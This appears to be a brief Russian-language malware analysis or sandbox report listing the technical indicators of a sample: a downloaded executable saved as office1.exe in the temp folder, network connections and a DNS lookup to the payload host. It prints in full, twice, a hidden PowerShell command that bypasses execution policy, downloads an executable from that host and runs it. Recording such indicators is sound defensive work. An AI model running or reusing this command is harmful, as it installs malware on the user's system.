Техническая информация
- https://a.cuntflaps.me/xs8c4.exe как %temp%\\office1.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://a.cuntflaps.me/xS8C4.exe','%TEMP%\\office1.exe') & %TEMP%\\office1.exe
- 'a.###tflaps.me':443
- 'a.###tflaps.me':443
- DNS ASK a.###tflaps.me
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://a.cuntflaps.me/xS8C4.exe','%TEMP%\\office1.exe') & %TEMP%\\office1.exe' (со скрытым окном)